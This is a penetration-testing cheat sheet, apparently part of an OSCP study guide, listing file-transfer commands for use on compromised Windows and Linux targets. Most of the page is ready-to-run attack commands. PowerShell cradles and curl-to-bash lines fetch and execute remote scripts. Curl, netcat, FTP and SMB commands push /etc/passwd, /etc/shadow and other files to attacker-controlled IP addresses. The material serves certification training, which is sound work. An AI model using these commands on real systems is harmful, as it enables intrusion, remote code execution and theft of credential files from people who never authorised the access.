Total OSCP Guide Payloads All The Things

📁File Transfer

For more detailed methods: https://hackersinterview.com/oscp/oscp-cheatsheet-windows-file-transfer-techniques/

Use my transfile.sh script from here

Windows

Powershell

Download file

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2/exploit.exe', 'exploit.exe')

Download and execute without saving on disk

powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.1.2/test.ps1')

To encode using powershell:

Decode in linux with base64 -d
[Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))

To upload using powershell

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Use python -m uploadserver on target
Invoke-FileUpload -Uri http://10.10.14.24:80/upload -File C:\Windows\System32\drivers\etc\hosts

CMD

certutil -urlcache -f ${file url} filename
powershell wget -Uri http://192.168.45.183/plink.exe -OutFile C:\Windows\Temp\plink.exe

Linux and Windows

Python Server

Attacker:

updog -p 80

OR

python3 -m uploadserver

Target:

Download

Use PSUpload.ps1
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Invoke-FileUpload -Uri http://<ip>:8000/upload -File C:\Path\to\file

Upload:

curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

To base64 encode:

$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Path\to\file' -Encoding Byte))
Invoke-WebRequest -Uri http://<ip>:8000/ -Method POST -Body $b64

Apache Server

sudo systemctl start apache2
sudo cp /path/to/file.exe /var/www/html/
download from apache server on powershell
powershell wget -Uri http://192.168.118.4/nc.exe -OutFile C:\Windows\Temp\nc.exe

SMB

Attacker:

impacket-smbserver NAME $(pwd) -smb2support -user aditya -password aditya

Target(powershell):

Copy files
copy \\192.168.220.133\share\nc.exe
Authenticated mount
net use n: \\10.10.14.24\share /user:test test

or

$pass = convertto-securestring 'aditya' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential{'aditya',$pass}
New-PSDrive -Name aditya -PSProvide FileSystem -Credential $cred -Root \\10.10.14.24\aditya
cd aditya:

FTP :

  • Attacker : To Host

python -m pyftpdlib 21

  • Target:

ftp ${IP}

To Upload:

Attacker:

sudo python3 -m pyftpdlib --port 21 --write

Target:

Powershell
(New-Object Net.WebClient).UploadFile('ftp://<ip>/ftp-hosts', 'C:\Path\to\File')
CMD
echo open 192.168.49.128 > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt

ftp> open 192.168.49.128

Log in with USER and PASS first.


ftp> USER anonymous
ftp> PUT c:\windows\system32\drivers\etc\hosts
ftp> bye

Webdav (If port 445 restrictions present)

Attcker:

sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

target:

The DavWWWRoot is required in windows
dir \\192.168.49.128\DavWWWRoot
To upload
copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\

Linux

If no write permissions:

curl 10.10.14.22/linpeas.sh | bash

Bash

#Connect to the Target Webserver
exec 3<>/dev/tcp/10.10.10.32/80
#HTTP GET Request
echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3
#Print the Response
cat <&3

Netcat

To read files:

nc -nv 192.168.49.249 80 < /etc/passwd

To receive:

nc -nlvp 80

Using netcat to send files:

Target

nc -l -p 1234 -q 1 > something.zip < /dev/null

Attack

cat something.zip | netcat <ip> 1234

SSH

If creds are available

scp linenum.sh user@remotehost:/remote/path/

Base64

Use mf5sum command to verify and file command to check type

Linux

To get base64 output of the file:

base64 file -w 0

Decrypt

file command to validate
echo "base64 string" | base64 -d > file

Powershell

To verify: Get-FileHash C:\Users\Public\filename -Algorithm md5
[IO.File]::WriteAllBytes("C:\Users\Public\filename", [Convert]::FromBase64String("base64string"))
PreviousPivotingNextBuffer Overflow

Last updated